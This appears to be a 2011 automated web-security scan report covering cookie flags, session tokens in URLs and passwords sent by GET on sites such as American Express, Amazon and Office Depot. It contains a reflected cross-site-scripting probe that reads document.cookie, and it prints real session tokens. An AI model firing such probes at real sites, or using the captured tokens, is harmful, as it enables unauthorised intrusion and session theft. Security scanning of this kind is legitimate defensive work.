GET /partnerzone/Login.action HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:05:28 GMT X-Cnection: close Content-Length: 1214 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: BIGipServerPlateau58_80=611926282.20480.0000; path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Pragma: no-cache Expires: Now X-Cnection: close Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=8 X-XSS-Protection: 1; mode=block Date: Sun, 06 Feb 2011 16:16:21 GMT Content-Length: 20580 Connection: close Set-Cookie: xing=|U2FsdGVkX19_zQEE5j6F0xWakCI8lARPFH0FvSjppQxKaaEiZ97wyTiFIr3wVgNP_sOYmtw76XJUBuFfNLnN-VmebVKNIrzd8O9V5UJjwWlPD27y8semPRdDksJAU0_2|; path=/; HttpOnly
<!DOCTYPE html> <html lang="en"> <head> <title>Business Network - Social Network for Business Professionals | XING</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: www134.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do?source=footer_prem_services HTTP/1.1 Host: www152.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /merchant/mainpagedom/authreg_showMainpage.do?ssolang=en_US&ssobrand=SOMSET&dispute=N&inav=menu_myacct_merchantacct HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:22:10 GMT Server: IBM_HTTP_Server Cache-Control: no-store Location: https://sso.americanexpress.com/SSO/request?request_type=un_logon&TYPE=33554432&REALMOID=06-bab29d3a-fb73-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$vSv7ddov8PItwO4vXIvOBx8HCsMWMGOmYXAmNyynqt%2b0Zzw6ZC66fAn%2bpdxgQwhf&TARGET=$SM$HTTPS%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo%3fssolang%3den_US%26ssobrand%3dSOMSET%26dispute%3dN%26inav%3dmenu_myacct_merchantacct Content-Length: 739 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerwww309-443=3272346122.47873.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://sso.americanexpress.com/SSO/request?req ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /version/7.01/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK x-amz-id-2: 5+JpAfUzR5I/l5+5terwWBJSdq4S0G7xBbqUC6YnMNqOPnKKfPS4oCsdD55z/S/d x-amz-request-id: 67E572F2463026B9 Date: Wed, 02 Feb 2011 10:25:48 GMT Last-Modified: Wed, 02 Feb 2011 09:44:48 GMT ETag: "59eaf83b40877b88329050509fa514f4" Accept-Ranges: bytes Content-Type: text/css Content-Length: 26527 Server: AmazonS3 Age: 20235 X-Cache: Hit from cloudfront X-Amz-Cf-Id: c58f9f6242adf1a61e2a8af7185e392ad623501ea3d66d16d5c992cff9045ffd8c3eb7e5f52ee857 Via: 1.0 f3f50cbd3d1def6bce4a308bcfd00161.cloudfront.net:11180 (CloudFront), 1.0 892bc90fb3654cd9a2c91531db2d359d.cloudfront.net:11180 (CloudFront) Connection: keep-alive
/**************************************************************************************/ /******** STARTSITE CSS - Hier stehen Css Klassen für die Startseite *****************/ /******************* ...[SNIP]...
GET /fb/a/mailverify HTTP/1.1 Host: feedburner.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:32:44 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Set-Cookie: S=feedburner-control-panel=XBvt5onSLx9jPcXP90cfRA; Domain=.google.com; Path=/; HttpOnly Server: GSE Expires: Sat, 05 Feb 2011 23:32:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html>
GET /group/jquery-dev/browse_thread/thread/36395b7ab510dd5d HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:51:06 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... </script><script src="http://session.owneriq.net/regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czo0ODoiL2V4L21mZy9oZWFkbGluZS9tL2FyaWVucy9kL3R5cGUvcHJvZHVjdF9wcm9ibGVtIjtzOjY6InNlcnZlciI7czozMToiaG9tZWFwcGxpYW5jZS5tYW51YWxzb25saW5lLmNvbSI7fQ,," type="text/javascript"></script> ...[SNIP]...
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
GET /NA7/ats/careers/jobSearch.jsp?org=VIBRANT&cws=1 HTTP/1.1 Host: tbe.taleo.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:21 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 31 Dec 1969 23:59:59 GMT Set-Cookie: JSESSIONID=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm; Path=/NA7/ats P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 10486
<HTML><HEAD> <STYLE type="text/css"> #taleoContent { padding: 0px; margin: 0px; margin-top: 15px; border: none; font-family: ...[SNIP]... <br>To fill out a general application form <a tabIndex='33' href='http://tbe.taleo.net/NA7/ats/careers/apply.jsp;jsessionid=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm?org=VIBRANT&cws=1'>click here</a> ...[SNIP]...
GET /search/display?strqueryid=1&fc=1&websessionid=XrulBSFcVlVHM06AO6dbrhC&url=http://tools.cisco.com/security/center/home.x HTTP/1.1 Host: tools.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /index.cfm HTTP/1.1 Host: www.aeprepaid.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:53:10 GMT Server: Microsoft-IIS/6.0 Pragma: no-cache Expires: Sat, 05 Feb 14:53:10 Content-Language: en-US Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en"> <head>
<title>Prepaid Card - Know Your Balance</title>
<meta http-equiv="Content-Type" content="t ...[SNIP]... <li><a href="index.cfm?pageid=g05&ClientKey=Malls%20Sales%20Channel&CFID=1&CFTOKEN=C8701894A83E2EBE9F1C426E431DD246&CFSEQ=1" title="Log in to your account">Access My Account</a> ...[SNIP]... <td id="formNav"> <a href="index.cfm?pageid=g05&ClientKey=Malls%20Sales%20Channel&CFID=1&CFTOKEN=C8701894A83E2EBE9F1C426E431DD246&CFSEQ=1" class="btn" title="Return to the Gift Card home page">Cancel</a> ...[SNIP]...
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]... <div class="bannerImage"><a href="/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0KCJW8RY05PKJVC74BS4&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_ir/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_pr/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a> ...[SNIP]... <li><a href="/gp/redirect.html/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a> ...[SNIP]... <li><a href="/gp/redirect.html/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a> ...[SNIP]...
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
GET / HTTP/1.1 Host: www.mittelstandsblog.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 X-Pingback: http://www.mittelstandsblog.de/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10156&cm_re=HOME-_-AccordionAd1_1-_-WK24SSOnlineDeals_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_1-_-WK24SSOnlineDeals_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10157&cm_re=HOME-_-AccordionAd1_2-_-WK24SSRebateCenter_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_2-_-WK24SSRebateCenter_20090611_20140629&redirect=true
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10158&cm_re=HOME-_-AccordionAd1_3-_-WK24SSClearanceCenter_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_3-_-WK24SSClearanceCenter_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10159&cm_re=HOME-_-AccordionAd3_1-_-WK24STODBrandProd_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_1-_-WK24STODBrandProd_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10160&cm_re=HOME-_-AccordionAd3_2-_-WK24STProductsAZ_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_2-_-WK24STProductsAZ_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10161&cm_re=HOME-_-AccordionAd3_3-_-WK24STWLR_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_3-_-WK24STWLR_20090611_20140629&redirect=true
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:39:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/ Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... <li id="homeLink"><a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="">Home</a></li>
<li id="languageSwitch"><a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="dropdown">United States (English)</a> ...[SNIP]... <div class="brandLogo"> <a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" id="logo" class=""><img src="http://static.www.odcdn.com/images/us/od/brand.gif" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of B ...[SNIP]... <li id='storeLocator' class="overlayContainer">
<a href="/storelocator/input.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" target="_top" class="headingLink"><strong> ...[SNIP]... <span id="storeLocatorLinks"><a href="/storeDetails.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" id="storeDetailLink" class="">Store Details</a> | <a href="/directions.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="">Need Directions?</a> ...[SNIP]... <li id='orderByCatalog' class="overlayContainer"> <a href="/csl/quickAddBySku.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="headingLink"><strong class="trigger"> ...[SNIP]... <li class=""><a href="/csl/quickAddBySku.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">Order by Item #</a> ...[SNIP]... <li><a href="/virtualcatalog/virtualcatalog.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">View Online Catalog</a> ...[SNIP]... <li><a href="/a/catalog-request/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">Request a Catalog</a> ...[SNIP]... <div class="smCartSummaryDiv printHide"> <a href="/specialLinks.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?file=/misc/deliveryOptions.jsp" class="note">$50.00 more for FREE Next Business Day Delivery!*<br/> ...[SNIP]... <li id='viewCart'>
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:40:01 GMT Content-Length: 6309 Connection: close Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/ Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET / HTTP/1.1 Host: www.oneview.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:02:58 GMT Set-Cookie: JSESSIONID=22619842C67867F5B1EE74469F963957; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding X-Cache: MISS from squid.oneview.de X-Cache-Lookup: MISS from squid.oneview.de:80 Via: 1.0 squid.oneview.de:80 (squid/2.6.STABLE21) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
GET /p-bdv9UMaVrliL2 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <p> Maybe you should try <a href="/hulu.com;jsessionid=65D59184928FE764BF04CAF9660122C1">hulu.com</a>, <a href="/gawker.com;jsessionid=65D59184928FE764BF04CAF9660122C1">gawker.com</a> or <a href="/evite.com;jsessionid=65D59184928FE764BF04CAF9660122C1">evite.com</a> ...[SNIP]...
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /rmb-account/login-page HTTP/1.1 Host: channelmarketing.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
